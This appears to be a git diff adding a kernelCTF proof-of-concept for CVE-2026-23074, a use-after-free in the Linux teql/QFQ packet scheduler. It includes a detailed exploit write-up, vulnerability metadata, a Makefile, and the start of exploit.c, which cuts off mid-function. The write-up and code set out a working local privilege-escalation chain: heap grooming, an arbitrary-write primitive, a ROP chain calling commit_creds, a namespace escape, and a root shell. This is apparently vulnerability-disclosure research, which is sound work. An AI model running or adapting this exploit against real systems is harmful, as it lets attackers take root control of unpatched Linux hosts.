diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/exploit.md new file mode 100644 index 000000000..2705184ec --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/exploit.md @@ -0,0 +1,443 @@ +# **Vulnerability** + +## Summary + +Unlike a normal qdisc, the teql qdisc does not increment `sch->q.qlen` on enqueue and only updates it at dequeue time. Additionally, `teql_peek()` always returns NULL. + +This can cause problems when teql is used as a child qdisc of another qdisc. In the case of QFQ, `qdisc_dequeue()` is only called after peek succeeds. Since teql's peek always returns NULL, dequeue is never invoked. And because dequeue is never invoked, teql's `sch->q.qlen` is never updated, so `cl->qdisc->q.qlen` remains 0 even when packets actually exist inside teql. + +If the class's lmax is changed in this state, `qfq_change_class()` calls `qfq_deact_rm_from_agg()`. This function determines whether the class is active based on `sch->q.qlen`, and since `sch->q.qlen` is 0, it incorrectly judges the class as "inactive." However, the class was actually still linked in the aggregate's slot list, and this linkage is not cleaned up before the aggregate is freed. As a result, when the deferred packets are later scheduled, a dangling pointer is dereferenced, triggering a Use-After-Free that can potentially lead to privilege escalation. + +## **Vulnerability Analysis** + +### Aggregate Creation via `qfq_change_class()` + +When creating or changing a class in QFQ, `qfq_change_class()` is called. + +```c +static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid, + struct nlattr **tca, unsigned long *arg, + struct netlink_ext_ack *extack) +{ + struct qfq_sched *q = qdisc_priv(sch); + struct qfq_class *cl = (struct qfq_class *)*arg; + bool existing = false; + struct nlattr *tb[TCA_QFQ_MAX + 1]; + struct qfq_aggregate *new_agg = NULL; + u32 weight, lmax, inv_w, old_weight, old_lmax; +... 
+set_change_agg: + sch_tree_lock(sch); + new_agg = qfq_find_agg(q, lmax, weight); + if (new_agg == NULL) { /* create new aggregate */ + sch_tree_unlock(sch); + new_agg = kzalloc(sizeof(*new_agg), GFP_KERNEL); // [1] + if (new_agg == NULL) { + err = -ENOBUFS; + gen_kill_estimator(&cl->rate_est); + goto destroy_class; + } + sch_tree_lock(sch); + qfq_init_agg(q, new_agg, lmax, weight); + } + if (existing) + qfq_deact_rm_from_agg(q, cl); // [2] + else + qdisc_class_hash_insert(&q->clhash, &cl->common); + qfq_add_to_agg(q, new_agg, cl); + sch_tree_unlock(sch); + ... +} +``` + +When creating a class in QFQ, if no matching aggregate is found by `qfq_find_agg()`, a new aggregate is allocated at [1]. When changing the attributes of an existing class, `qfq_deact_rm_from_agg()` is called at [2] to remove the class from its current aggregate. + +```c +static struct qfq_aggregate *qfq_find_agg(struct qfq_sched *q, + u32 lmax, u32 weight) +{ + struct qfq_aggregate *agg; + + hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next) + if (agg->lmax == lmax && agg->class_weight == weight) + return agg; + + return NULL; +} +``` + +`qfq_find_agg()` considers an aggregate to be the same only when both lmax and weight match. Therefore, classes with different weight or lmax values are each linked to separate aggregates. + +By setting up the following structure, separate aggregates are created for class 1:1 and class 1:2 respectively. + +```text +ROOT qdisc 1:0 (QFQ) + ├── class 1:1 (weight=15, lmax=16384) -> netem + └── class 1:2 (weight=1, lmax=1514) -> teql +``` + +The teql qdisc, unlike a normal qdisc, does not increment `sch->q.qlen` on enqueue — it only updates `sch->q.qlen` at dequeue time — and `teql_peek()` always returns NULL. 
+ +```c +static int +teql_enqueue(struct sk_buff *skb, struct Qdisc *sch, struct sk_buff **to_free) +{ + struct net_device *dev = qdisc_dev(sch); + struct teql_sched_data *q = qdisc_priv(sch); + + if (q->q.qlen < READ_ONCE(dev->tx_queue_len)) { + __skb_queue_tail(&q->q, skb); + return NET_XMIT_SUCCESS; + } + + return qdisc_drop(skb, sch, to_free); +} + +static struct sk_buff * +teql_dequeue(struct Qdisc *sch) +{ + struct teql_sched_data *dat = qdisc_priv(sch); + ... + skb = __skb_dequeue(&dat->q); + ... + sch->q.qlen = dat->q.qlen + q->q.qlen; + return skb; +} + +static struct sk_buff * +teql_peek(struct Qdisc *sch) +{ + /* teql is meant to be used as root qdisc */ + return NULL; +} +``` + +This can cause problems when teql is used as a child qdisc of another qdisc. In the case of QFQ, `qdisc_dequeue()` is only called after `qdisc_peek_head()` succeeds. Since teql's peek always returns NULL, dequeue is never invoked. And because dequeue is never invoked, teql's `sch->q.qlen` is never updated, so `cl->qdisc->q.qlen` remains 0 even when packets actually exist inside teql. + +### Slot List Linkage of Aggregates + +When a packet is enqueued to the QFQ class of class 1:1, `qfq_dequeue()` is triggered, which in turn calls `qfq_schedule_agg()` → `qfq_slot_insert()`, storing the address of the class 1:1 aggregate in `slots[0].first`. + +```c +static void qfq_slot_insert(struct qfq_group *grp, struct qfq_aggregate *agg, + u64 roundedS) +{ + u64 slot = (roundedS - grp->S) >> grp->slot_shift; + unsigned int i; /* slot index in the bucket list */ + ... + i = (grp->front + slot) % QFQ_MAX_SLOTS; + + hlist_add_head(&agg->next, &grp->slots[i]); + __set_bit(slot, &grp->full_slots); +} +``` + +In `hlist_add_head(&agg->next, &grp->slots[i])`, the aggregate's address is inserted into `grp->slots[i]`. 
+ +When a packet is enqueued to the QFQ class of class 1:2, `qfq_enqueue()` → `qfq_activate_agg()` → `qfq_schedule_agg()` → `qfq_slot_insert()` is called, storing the address of the class 1:2 aggregate in `slots[0].first`. + +Subsequently, as the enqueued packet is dequeued, `qfq_schedule_agg(q, in_serv_agg)` is triggered within `qfq_dequeue()`, which calls `qfq_slot_insert()`. Since `in_serv_agg` is the class 1:1 aggregate, this causes the address of the class 1:1 aggregate to be stored in `slots[0].first` once again. Then `qfq_dequeue()` continues to operate, performing `qfq_choose_next_agg()` → `qfq_front_slot_remove()`, during which the class 1:1 aggregate is removed from `slots[0].first`, leaving the address of the class 1:2 aggregate in `slots[0].first` . + +```c +static struct sk_buff *qfq_dequeue(struct Qdisc *sch) +{ + struct qfq_sched *q = qdisc_priv(sch); + struct qfq_aggregate *in_serv_agg = q->in_serv_agg; + struct qfq_class *cl; + struct sk_buff *skb = NULL; + /* next-packet len, 0 means no more active classes in in-service agg */ + unsigned int len = 0; + ... + if (len == 0 || in_serv_agg->budget < len) { + charge_actual_service(in_serv_agg); + + /* recharge the budget of the aggregate */ + in_serv_agg->initial_budget = in_serv_agg->budget = + in_serv_agg->budgetmax; + + if (!list_empty(&in_serv_agg->active)) { + /* + * Still active: reschedule for + * service. Possible optimization: if no other + * aggregate is active, then there is no point + * in rescheduling this aggregate, and we can + * just keep it as the in-service one. This + * should be however a corner case, and to + * handle it, we would need to maintain an + * extra num_active_aggs field. + */ + qfq_update_agg_ts(q, in_serv_agg, requeue); + qfq_schedule_agg(q, in_serv_agg); + } else if (sch->q.qlen == 0) { /* no aggregate to serve */ + q->in_serv_agg = NULL; + return NULL; + } + + /* + * If we get here, there are other aggregates queued: + * choose the new aggregate to serve. 
+ */ + in_serv_agg = q->in_serv_agg = qfq_choose_next_agg(q); + skb = qfq_peek_skb(in_serv_agg, &cl, &len); + } +... + return skb; +} +``` + +### Dangling Pointer Generation + +When the class 1:2 attributes are changed (lmax change), `qfq_change_class()` → `qfq_deact_rm_from_agg()` → `qfq_rm_from_agg()` → `qfq_destroy_agg()` is executed, freeing the class 1:2 aggregate. + +```c +/* Deschedule class and remove it from its parent aggregate. */ +static void qfq_deact_rm_from_agg(struct qfq_sched *q, struct qfq_class *cl) +{ + if (cl->qdisc->q.qlen > 0) /* class is active */ // [3] + qfq_deactivate_class(q, cl); + + qfq_rm_from_agg(q, cl); +} +``` + +At [3], since teql's `sch->q.qlen` is always 0, the condition is not entered. As a result, `qfq_deactivate_class()` is never called, and the aggregate is not removed from the slot list. + +```c +/* Remove class from its parent aggregate. */ +static void qfq_rm_from_agg(struct qfq_sched *q, struct qfq_class *cl) +{ + struct qfq_aggregate *agg = cl->agg; + + cl->agg = NULL; + if (agg->num_classes == 1) { /* agg being emptied, destroy it */ + qfq_destroy_agg(q, agg); + return; + } + qfq_update_agg(q, agg, agg->num_classes-1); +} + +static void qfq_destroy_agg(struct qfq_sched *q, struct qfq_aggregate *agg) +{ + hlist_del_init(&agg->nonfull_next); + q->wsum -= agg->class_weight; + if (q->wsum != 0) + q->iwsum = ONE_FP / q->wsum; + + if (q->in_serv_agg == agg) + q->in_serv_agg = qfq_choose_next_agg(q); + kfree(agg); // [4] +} +``` + +When the last class is removed from the aggregate, `qfq_destroy_agg()` is called. At [4], the aggregate is freed, but since the address of the class 1:2 aggregate still remains in `slots[0].first`, a dangling pointer is created. + +### Use-After-Free Trigger + +At this point, when `qfq_dequeue()` is triggered again due to the delayed netem, `qfq_choose_next_agg()` is called, which invokes `qfq_front_slot_remove(grp)`. 
In `qfq_slot_head(grp)`, the freed class 1:2 aggregate is retrieved and used, triggering a Use-After-Free. + +```c +static struct qfq_aggregate *qfq_choose_next_agg(struct qfq_sched *q) +{ + struct qfq_group *grp; + struct qfq_aggregate *agg, *new_front_agg; + u64 old_F; + + qfq_update_eligible(q); + q->oldV = q->V; + + if (!q->bitmaps[ER]) + return NULL; + + grp = qfq_ffs(q, q->bitmaps[ER]); + old_F = grp->F; + + agg = qfq_slot_head(grp); + + /* agg starts to be served, remove it from schedule */ + qfq_front_slot_remove(grp); // [5] +... + return agg; +} + +static void qfq_front_slot_remove(struct qfq_group *grp) +{ + struct qfq_aggregate *agg = qfq_slot_head(grp); // [6] + + BUG_ON(!agg); + hlist_del(&agg->next); // [7] + if (hlist_empty(&grp->slots[grp->front])) + __clear_bit(0, &grp->full_slots); +} + +static struct qfq_aggregate *qfq_slot_head(struct qfq_group *grp) +{ + return hlist_entry(grp->slots[grp->front].first, + struct qfq_aggregate, next); +} +``` + +At [5], when attempting to remove the first aggregate from the slot, the freed class 1:2 aggregate is retrieved at [6], and a Use-After-Free is triggered at [7]. + +# Exploit + +## UAF-Unlink + +```c +struct qfq_aggregate { + struct hlist_node next; /* 0 16 */ + u64 S; /* 16 8 */ + u64 F; /* 24 8 */ + struct qfq_group * grp; /* 32 8 */ + u32 class_weight; /* 40 4 */ + int lmax; /* 44 4 */ + u32 inv_w; /* 48 4 */ + u32 budgetmax; /* 52 4 */ + u32 initial_budget; /* 56 4 */ + u32 budget; /* 60 4 */ + int num_classes; /* 64 4 */ + /* XXX 4-byte hole */ + struct list_head active; /* 72 16 */ + struct hlist_node nonfull_next; /* 88 16 */ +}; +``` + +The `qfq_aggregate` structure is 104 bytes in size, corresponding to kmalloc-128. 
+ +The point where the Use-After-Free occurs is `hlist_del()`, and the code is as follows: + +```c +static inline void hlist_del(struct hlist_node *n) +{ + __hlist_del(n); + n->next = LIST_POISON1; + n->pprev = LIST_POISON2; +} + +static inline void __hlist_del(struct hlist_node *n) +{ + struct hlist_node *next = n->next; + struct hlist_node **pprev = n->pprev; + + WRITE_ONCE(*pprev, next); // [8] + if (next) + WRITE_ONCE(next->pprev, pprev); +} +``` + +The unlink operation is performed at [8] in `__hlist_del()`. If another object can be allocated in the freed region and its values manipulated, this becomes a primitive capable of writing 8 bytes to an arbitrary address. + +This vulnerability shares similar characteristics with CVE-2025-38477, so the LL_ATK and NPerm techniques presented in that exploit were utilized. + +## Constructing an Arbitrary 8-byte Write Primitive + +To construct a primitive capable of writing 8 bytes to an arbitrary address, the `hlist_node` structure values located at offsets 0x0 and 0x8 of the freed region must be controllable. PGV was used for this purpose. + +1. Numerous aggregate objects are allocated before and after the UAF-triggering object allocation, so that the entire page where the vulnerable object resides is filled with objects of the same type. +2. After freeing all aggregate objects, the vulnerable object is freed so that the entire page containing the UAF object is returned to the buddy allocator. +3. PGV is sprayed onto the returned buddy page to reclaim the page containing the UAF object, allowing control over the hlist_node values and thereby obtaining an arbitrary 8-byte write primitive. + +With the arbitrary write primitive secured, LL_ATK can be performed. LL_ATK is a technique that uses a UAF-Unlink primitive to insert a fake node created by the attacker into an existing kernel linked list, then induces code execution through normal kernel flow. 
+ +In this exploit, code execution was achieved by corrupting a function pointer in `rtnl_link_ops`. + +Once function pointer corruption is possible, a suitable location must be selected for placing the fake node that will hold the ROP chain. The NPerm technique was utilized here. +During kernel initialization, there are cases where certain freed pages are not fully unmapped from specific kernel resource regions. These pages can later be reallocated in response to userspace `mmap()` requests, resulting in the same page being simultaneously mapped in both userspace and kernel space. + +This allows the page contents to be freely manipulated from userspace, and as long as KASLR is bypassed, the kernel virtual address of the page can be calculated. In other words, a kernel memory region is secured where both memory control and address prediction are simultaneously possible. + +In this exploit, the [__init_begin, __init_end] region was designated as the fake node location, and ROP gadgets were placed across all pages after mmap(). + +## ROP + +### Bypassing `qfq_peek_skb()` + +Before ROP execution, in the `qfq_dequeue()` flow where the UAF occurs, the `(*cl)->qdisc->ops->peek()` call in `qfq_peek_skb()` is executed first. + +```c +static inline struct sk_buff *qfq_peek_skb(struct qfq_aggregate *agg, + struct qfq_class **cl, + unsigned int *len) +{ + struct sk_buff *skb; + + *cl = list_first_entry(&agg->active, struct qfq_class, alist); + skb = (*cl)->qdisc->ops->peek((*cl)->qdisc); + if (skb == NULL) + qdisc_warn_nonwc("qfq_dequeue", (*cl)->qdisc); + else + *len = qdisc_pkt_len(skb); + + return skb; +} +``` + +After analyzing the register state at this point, no suitable gadget was found for a stack pivot. Therefore, an `xor eax, eax; ret` gadget was used to return NULL and pass through this stage. 
+ +```c +((size_t*)addr)[FAKE_CL_PTR] = cl; +((size_t*)addr)[FAKE_QDISC_PTR] = qdisc; +((size_t*)addr)[FAKE_OPS_PEEK_PTR] = xor_eax_jmp; // Bypass by returning NULL +``` + +ROP Chain Construction + +Exploit code: + +```cpp + RopChain rop(*g_target, kaslr); + // skip + rop.Add(stack_shift2_ret); + rop.Add(0); + rop.Add(init_region_base + FAKE_KIND_STRING_INDEX * sizeof(size_t)); + rop.Add(stack_shift5_ret); + rop.Add(1); + rop.Add(2); + rop.Add(0); + rop.Add(0); + rop.Add(0); + rop.Add(stack_shift5_ret); + rop.Add(1); + rop.Add(2); + rop.Add(0); + rop.Add(0); + rop.Add(0); + rop.Add(stack_shift2_ret); + rop.Add(0); + rop.Add(stack_pivot); + + // Privilege escalation + rop.AddRopAction(RopActionId::COMMIT_INIT_TASK_CREDS); + rop.AddRopAction(RopActionId::SWITCH_TASK_NAMESPACES, {1}); + + // Return to userspace + rop.Add(swapgs_restore_regs_and_return_to_usermode + 54); + rop.Add(0); + rop.Add(0); + rop.Add((uint64_t)get_shell); + rop.Add(user_cs); + rop.Add(user_rflags); + rop.Add(user_rsp & 0xffffffffffffff00); + rop.Add(user_ss); +``` + +The ROP chain shares a memory region with the fake `rtnl_link_ops` structure. As a result, structure field values such as the `kind` pointer and the `stack_pivot` address are fixed at specific positions within the ROP chain. + +To skip over these fixed values, `stack_shift2_ret` and `stack_shift5_ret` gadgets were used to jump past those regions. + +Privilege escalation is then performed using libxdk's RopActions: + +- COMMIT_INIT_TASK_CREDS: Executes `commit_creds(prepare_kernel_cred(0))` +- SWITCH_TASK_NAMESPACES: Executes `switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)` to switch to the init process's namespace +Finally, execution returns to userspace via `swapgs_restore_regs_and_return_to_usermode`, where the `get_shell()` function is invoked. 
+ +## Exploit Summary + +- **Prefetch** → Kernel base address leak +- **NPerm** → Payload placement adjacent to kernel resources +- **LL_ATK** → Fake node insertion +- **Function pointer trigger** +- **ROP** → Privilege escalation (COMMIT_INIT_TASK_CREDS) + namespace escape (SWITCH_TASK_NAMESPACES) + +## Additional Notes + +This vulnerability shares similar characteristics with CVE-2025-38477, so the LL_ATK and NPerm techniques presented in that exploit were utilized. However, since the related documentation is still in the pull request stage and has not yet been merged, it is referenced by CVE number rather than a direct link. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/vulnerability.md new file mode 100644 index 000000000..92e91cb59 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/docs/vulnerability.md @@ -0,0 +1,13 @@ +# Vulnerability Details + +- **Requirements**: + - **Capabilities**: `CAP_NET_ADMIN` + - **Kernel configuration**: `CONFIG_NET_SCHED=y, CONFIG_NET_SCH_TEQL=y` + - **User namespaces required**: Yes +- **Introduced by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 +- **Fixed by**: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=50da4b9d07a7a463e2cfb738f3ad4cff6b2c9c3b +- **Affected Version**: `v2.6.12-rc2 - v6.19-rc6` +- **Affected Component**: `net/sched: sch_teql` +- **Syscall to disable**: `unshare` +- **Cause**: Use-After-Free +- **Description**: A Use-After-Free vulnerability was discovered in the Linux kernel's TC (Traffic Control) scheduler. When teql is used as a child qdisc instead of a root qdisc, qlen is not properly updated, causing the parent qdisc to misjudge the class state, resulting in a dangling pointer and triggering a Use-After-Free. 
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/Makefile b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/Makefile new file mode 100644 index 000000000..00f39bb3f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/Makefile @@ -0,0 +1,27 @@ +CC = gcc +CXX = g++ +CFLAGS = -static -DKASLR_BYPASS_INTEL=1 +CXXFLAGS = -static -DKASLR_BYPASS_INTEL=1 +LDFLAGS = -lkernelXDK + +all: exploit + +prerequisites: + wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +kaslr_bypass.o: kaslr_bypass.c kaslr_bypass.h + $(CC) $(CFLAGS) -c kaslr_bypass.c -o kaslr_bypass.o + +exploit.o: exploit.c kaslr_bypass.h + $(CXX) $(CXXFLAGS) -c exploit.c -o exploit.o + +exploit: exploit.o kaslr_bypass.o + $(CXX) $(CXXFLAGS) -o exploit exploit.o kaslr_bypass.o $(LDFLAGS) + +exploit_debug: exploit.c kaslr_bypass.c kaslr_bypass.h + $(CC) $(CFLAGS) -g -c kaslr_bypass.c -o kaslr_bypass_dbg.o + $(CXX) $(CXXFLAGS) -g -c exploit.c -o exploit_dbg.o + $(CXX) $(CXXFLAGS) -g -o exploit_debug exploit_dbg.o kaslr_bypass_dbg.o $(LDFLAGS) + +clean: + rm -f exploit exploit_debug *.o \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit new file mode 100755 index 000000000..60d984737 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.c b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.c new file mode 100644 index 000000000..60d162948 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23074_cos/exploit/cos-113-18244.521.39/exploit.c @@ -0,0 +1,834 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include 
+#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "kaslr_bypass.h" + +#define NLA_F_NESTED (1 << 15) +#define TC_HANDLE(maj, min) (((maj) << 16) | (min)) +#define KASLR_BYPASS_INTEL 1 +#define TC_MSG_BUFSIZE 16384 +#define PAGE_SIZE 0x1000 +#define SPRAY_CLASS_COUNT 128 +#define SPRAY_QDISC TC_HANDLE(100, 0) +#define LOOPBACK_ADDR 0x7F000001 + +// nlmsg tail pointer calculation +#define NLMSG_TAIL(nmsg) ((struct rtattr*)(((char*)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len))) +#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) + + +// xor eax, eax ; jmp __x86_return_thunk +#define GADGET_XOR_EAX_JMP 0x14b400 + +// "ipvlan" (little-endian) +#define FAKE_KIND_STRING_IPVLAN 0x6e616c767069 +#define FAKE_KIND_STRING_INDEX 0x100 +#define FAKE_CL_PTR 0x0a +#define FAKE_QDISC_PTR 0x23 +#define FAKE_OPS_PEEK_PTR 0x47 +#define FAKE_CL_STRUCT_OFFS 0x100 +#define FAKE_QDISC_STRUCT_OFFS 0x200 +#define FAKE_ROP_CHAIN_OFFS 0x840 +#define FAKE_DUMMY_PTR_OFFS 0x500 +#define FAKE_CL_ALIST_OFFS 0x58 + +typedef struct { + int fd; + char *mapped; + size_t size; +} pgv_frame_t; + +struct nl_req { + struct nlmsghdr nlh; + struct ifinfomsg ifi; + char buf[512]; +}; + +Target* g_target = nullptr; + +uint64_t __init_begin = 0; +uint64_t bond_link_ops = 0; +uint64_t init_region_base = 0; +uint64_t swapgs_restore_regs_and_return_to_usermode = 0; +uint64_t stack_pivot = 0; +uint64_t stack_shift2_ret = 0; +uint64_t stack_shift5_ret = 0; +uint64_t xor_eax_jmp = 0; +unsigned long user_cs,user_ss,user_rsp,user_rflags; +static int spray_ifindex = 0; +pgv_frame_t pgv[2] = {}; +static char g_nl_buf[TC_MSG_BUFSIZE]; + +INCBIN(target_db, "target_db.kxdb"); + +static void save_state() { + asm( + "movq %%cs, %0\n" + "movq %%ss, %1\n" + "movq %%rsp, %2\n" + "pushfq\n" + "popq %3\n" + : "=r" (user_cs), "=r" (user_ss), "=r" 
(user_rsp),"=r" (user_rflags) : : "memory"); +} + +void setup_cpu_affinity(int cpu) { + cpu_set_t cpu_set; + CPU_ZERO(&cpu_set); + CPU_SET(cpu, &cpu_set); + if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) { + perror("sched_setaffinity()"); + exit(EXIT_FAILURE); + } + usleep(1000); +} + +void setup_sandbox() +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + int fd; + char buf[32]; + + if (unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET) < 0) { + perror("unshare"); + exit(1); + } + + fd = open("/proc/self/setgroups", O_WRONLY); + write(fd, "deny", 4); + close(fd); + + fd = open("/proc/self/uid_map", O_WRONLY); + snprintf(buf, sizeof(buf), "0 %d 1", uid); + write(fd, buf, strlen(buf)); + close(fd); + + fd = open("/proc/self/gid_map", O_WRONLY); + snprintf(buf, sizeof(buf), "0 %d 1", gid); + write(fd, buf, strlen(buf)); + close(fd); +} + + +// loopback interface up +static void setup_loopback(void) +{ + int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP); + if (sock < 0) return; + + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strcpy(ifr.ifr_name, "lo"); + + ifr.ifr_flags = IFF_UP | IFF_LOOPBACK | IFF_RUNNING; + ioctl(sock, SIOCSIFFLAGS, &ifr); + + struct sockaddr_in *addr = (struct sockaddr_in *)&ifr.ifr_addr; + addr->sin_family = AF_INET; + addr->sin_addr.s_addr = htonl(LOOPBACK_ADDR); + ioctl(sock, SIOCSIFADDR, &ifr); + + close(sock); +} + +void setup_env(void){ + setup_sandbox(); + setup_cpu_affinity(0); + save_state(); + setup_loopback(); +} + +void get_shell(void) +{ + int mntns_fd = open("/proc/1/ns/mnt", O_RDONLY); + if (mntns_fd >= 0) { + setns(mntns_fd, CLONE_NEWNS); + close(mntns_fd); + } + + static const char *sh_args[] = {"/bin/sh", nullptr}; + execve("/bin/sh", (char *const *)sh_args, nullptr); +} + +// KASLR-adjusted kernel symbol/gadget address calculation +void setup_kernel_address() { + + __init_begin = kaslr + g_target->GetSymbolOffset("__init_begin"); + bond_link_ops = kaslr + g_target->GetSymbolOffset("bond_link_ops"); + 
swapgs_restore_regs_and_return_to_usermode = kaslr + g_target->GetSymbolOffset("swapgs_restore_regs_and_return_to_usermode"); + xor_eax_jmp = kaslr + g_target->GetSymbolOffset("gadget_xor_eax_ret"); + + init_region_base = __init_begin + 0x100000; + + auto& pivots = g_target->GetPivots(); + // RCX-based stack pivot search + for (auto& og : pivots.one_gadgets) { + if (og.pivot_reg.reg == Register::RCX) { + stack_pivot = kaslr + og.address; + printf("[+] Found RCX pivot at offset 0x%lx\n", (uint64_t)og.address); + break; + } + } + // Find gadget that skips 2 stack slots + for (auto& ss : pivots.stack_shifts) { + if (ss.shift_amount == 24 && ss.ret_offset == 16) { + stack_shift2_ret = kaslr + ss.address; + break; + } + } + // Find gadget that skip 5 stack slots + for (auto& ss : pivots.stack_shifts) { + if (ss.shift_amount == 48 && ss.ret_offset == 40) { + stack_shift5_ret = kaslr + ss.address; + break; + } + } + +} + +/* + * Netlink message builder + */ + +static struct nlmsghdr* nl_msg_init(void) +{ + struct nlmsghdr* msg = (struct nlmsghdr*)g_nl_buf; + memset(msg, 0, TC_MSG_BUFSIZE); + msg->nlmsg_len = NLMSG_ALIGN(NLMSG_LENGTH(0)); + return msg; +} + +static struct tcmsg* nl_msg_init_tc(struct nlmsghdr* msg, uint16_t type, + uint16_t flags, int ifindex, + uint32_t parent, uint32_t handle) +{ + struct tcmsg* tc; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_type = type; + msg->nlmsg_flags = flags; + tc = (struct tcmsg*)NLMSG_DATA(msg); + tc->tcm_family = AF_UNSPEC; + tc->tcm_ifindex = ifindex; + tc->tcm_parent = parent; + tc->tcm_handle = handle; + return tc; +} + +static int nl_attr_put(struct nlmsghdr* msg, int maxlen, int type, + const void* data, int alen) +{ + int len = RTA_LENGTH(alen); + struct rtattr* rta; + if (NLMSG_ALIGN(msg->nlmsg_len) + RTA_ALIGN(len) > (unsigned int)maxlen) + return -1; + rta = NLMSG_TAIL(msg); + rta->rta_type = type; + rta->rta_len = len; + if (alen && data) + memcpy(RTA_DATA(rta), data, alen); + msg->nlmsg_len = 
NLMSG_ALIGN(msg->nlmsg_len) + RTA_ALIGN(len); + return 0; +} + +static int nl_attr_put_str(struct nlmsghdr* msg, int maxlen, int type, const char* str) +{ + return nl_attr_put(msg, maxlen, type, str, strlen(str) + 1); +} + +static int nl_attr_put_u32(struct nlmsghdr* msg, int maxlen, int type, uint32_t v) +{ + return nl_attr_put(msg, maxlen, type, &v, 4); +} + +static struct rtattr* nl_attr_nest_start(struct nlmsghdr* msg, int maxlen, int type) +{ + struct rtattr* nest = NLMSG_TAIL(msg); + + if (nl_attr_put(msg, maxlen, type | NLA_F_NESTED, NULL, 0) < 0) + return NULL; + return nest; +} + +static void nl_attr_nest_end(struct nlmsghdr* msg, struct rtattr* nest) +{ + nest->rta_len = (char*)NLMSG_TAIL(msg) - (char*)nest; +} + +static int nl_send(int sock, struct nlmsghdr* msg) +{ + struct sockaddr_nl nladdr; + struct iovec iov; + struct msghdr msgh; + memset(&nladdr, 0, sizeof(nladdr)); + nladdr.nl_family = AF_NETLINK; + iov.iov_base = msg; + iov.iov_len = msg->nlmsg_len; + memset(&msgh, 0, sizeof(msgh)); + msgh.msg_name = &nladdr; + msgh.msg_namelen = sizeof(nladdr); + msgh.msg_iov = &iov; + msgh.msg_iovlen = 1; + return sendmsg(sock, &msgh, 0); +} + +// send packet to specific class via classid +static void send_to_class(uint32_t classid, int count) +{ + int sock; + struct sockaddr_in addr; + char data[64] = "trigger"; + + sock = socket(AF_INET, SOCK_DGRAM, 0); + if (sock < 0) + return; + + const char* ifname = "lo"; + setsockopt(sock, SOL_SOCKET, SO_BINDTODEVICE, ifname, strlen(ifname)); + + struct timeval tv = {0, 10000}; + setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv)); + + memset(&addr, 0, sizeof(addr)); + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = htonl(LOOPBACK_ADDR); + addr.sin_port = htons(12345); + + if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) { + int prio = classid; + setsockopt(sock, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio)); + for (int i = 0; i < 
count; i++) + write(sock, data, sizeof(data)); + } + close(sock); +} + +// delete qdisc +static int del_qdisc(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_DELQDISC, NLM_F_REQUEST, ifindex, parent, handle); + return nl_send(sock, msg); +} + +// cleanup TC +static void cleanup_tc(int sock, int ifindex) +{ + del_qdisc(sock, ifindex, TC_H_ROOT, 0); +} + +// add QFQ qdisc +static void add_qdisc_qfq(int sock, int ifindex, uint32_t parent, uint32_t handle) +{ + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWQDISC, NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL,ifindex, parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "qfq"); + nl_send(sock, msg); +} + +// add QFQ class +static int add_class_qfq(int sock, int ifindex, uint32_t parent, uint32_t handle, + uint32_t weight, uint32_t limit) +{ + struct rtattr* nest; + struct nlmsghdr* msg = nl_msg_init(); + nl_msg_init_tc(msg, RTM_NEWTCLASS, NLM_F_REQUEST | NLM_F_CREATE, ifindex,parent, handle); + nl_attr_put_str(msg, TC_MSG_BUFSIZE, TCA_KIND, "qfq"); + nest = nl_attr_nest_start(msg, TC_MSG_BUFSIZE, TCA_OPTIONS); + nl_attr_put_u32(msg, TC_MSG_BUFSIZE, TCA_QFQ_WEIGHT,weight); + nl_attr_put_u32(msg, TC_MSG_BUFSIZE, TCA_QFQ_LMAX, 